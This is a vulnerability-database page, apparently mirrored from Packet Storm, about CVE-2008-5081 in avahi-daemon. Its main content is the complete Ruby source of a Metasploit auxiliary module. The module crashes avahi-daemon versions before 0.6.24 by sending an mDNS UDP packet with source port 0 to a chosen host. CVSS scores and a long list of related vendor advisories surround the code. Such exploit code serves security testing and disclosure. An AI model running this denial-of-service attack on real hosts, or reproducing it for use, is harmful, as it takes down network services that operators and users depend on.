Lucene search
Kris Katterjohn, metasploit.comPACKETSTORM:180498HistoryAug 31, 2024 - 12:00 a.m.
Avahi Source Port 0 Denial of Service
2024-08-3100:00:00
Kris Katterjohn, metasploit.com
packetstormsecurity.com
17
avahi
dos
mdns
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
6.9
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Avahi Source Port 0 DoS',
'Description' => %q{
Avahi-daemon versions prior to 0.6.24 can be DoS'd
with an mDNS packet with a source port of 0.
},
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2008-5081' ],
[ 'OSVDB', '50929' ],
],
'DisclosureDate' => 'Nov 14 2008')
register_options([
OptInt.new('RPORT', [true, 'The destination port', 5353])
])
deregister_options('FILTER','PCAPFILE')
end
def run
open_pcap
print_status("Sending to #{rhost}")
p = PacketFu::UDPPacket.new
p.ip_saddr = "0.0.0.0"
p.ip_daddr = rhost
p.ip_frag = 0x4000 # Original had ip frag flags set to 2 for some reason.
p.udp_sport = 0 # That's the bug
p.udp_dport = datastore['RPORT'].to_i
p.payload = Rex::Text.rand_text(rand(0x20)) # UDP needs at least one data byte, may as well send a few.
p.recalc
capture_sendto(p, rhost) and print_status("Avahi should be down now")
close_pcap
end
end
`
Related
nessus
nessus
RHEL 5 : avahi (RHSA-2009:0013)
2009-01-13 00:00:00
Scientific Linux Security Update : avahi on SL5.x i386/x86_64
2012-08-01 00:00:00
Mandriva Linux Security Advisory : avahi (MDVSA-2009:031)
2009-04-23 00:00:00
openvas
openvas
RedHat Security Advisory RHSA-2009:0013
2009-01-13 00:00:00
Gentoo Security Advisory GLSA 200901-11 (avahi)
2009-01-20 00:00:00
Mandrake Security Advisory MDVSA-2009:031 (avahi)
2009-02-02 00:00:00
fedora
fedora
[SECURITY] Fedora 10 Update: avahi-0.6.22-12.fc10
2009-01-07 09:33:13
cve
cve
CVE-2008-5081
2008-12-17 02:30:00
CVE-2010-2244
2010-07-08 12:54:47
nvd
nvd
CVE-2008-5081
2008-12-17 02:30:00
CVE-2010-2244
2010-07-08 12:54:47
gentoo
gentoo
Avahi: Denial of service
2009-01-14 00:00:00
seebug
seebug
Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit
2008-12-21 00:00:00
Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit
2014-07-01 00:00:00
exploitdb
exploitdb
Avahi < 0.6.24 - mDNS Daemon Remote Denial of Service
2008-12-19 00:00:00
centos
centos
avahi security update
2009-01-14 00:46:56
prion
prion
Design/Logic Flaw
2008-12-17 02:30:00
Design/Logic Flaw
2010-07-08 12:54:00
exploitpack
exploitpack
Avahi 0.6.24 - mDNS Daemon Remote Denial of Service
2008-12-19 00:00:00
ubuntucve
ubuntucve
CVE-2008-5081
2008-12-17 00:00:00
CVE-2010-2244
2010-07-08 00:00:00
securityvulns
securityvulns
Avahi multicast DNS server DoS
2008-12-23 00:00:00
[SECURITY] [DSA 1690-1] New avahi packages fix denial of service
2008-12-23 00:00:00
zdt
zdt
Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit
2008-12-19 00:00:00
redhat
redhat
(RHSA-2009:0013) Moderate: avahi security update
2009-01-12 00:00:00
debiancve
debiancve
CVE-2008-5081
2008-12-17 02:30:00
CVE-2010-2244
2010-07-08 12:54:47
metasploit
metasploit
Avahi Source Port 0 DoS
2010-02-23 18:03:54
oraclelinux
oraclelinux
avahi security update
2009-01-12 00:00:00
cvelist
cvelist
CVE-2008-5081
2008-12-17 02:00:00
CVE-2010-2244
2010-07-07 18:00:00
debian
debian
[SECURITY] [DSA 1690-1] New avahi packages fix denial of service
2008-12-22 06:49:55
ubuntu
ubuntu
Avahi vulnerabilities
2008-12-18 00:00:00
osv
osv
avahi - denial of service
2008-12-22 00:00:00
CVSS2
5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
AI Score
6.9
Confidence
Low
Related for PACKETSTORM:180498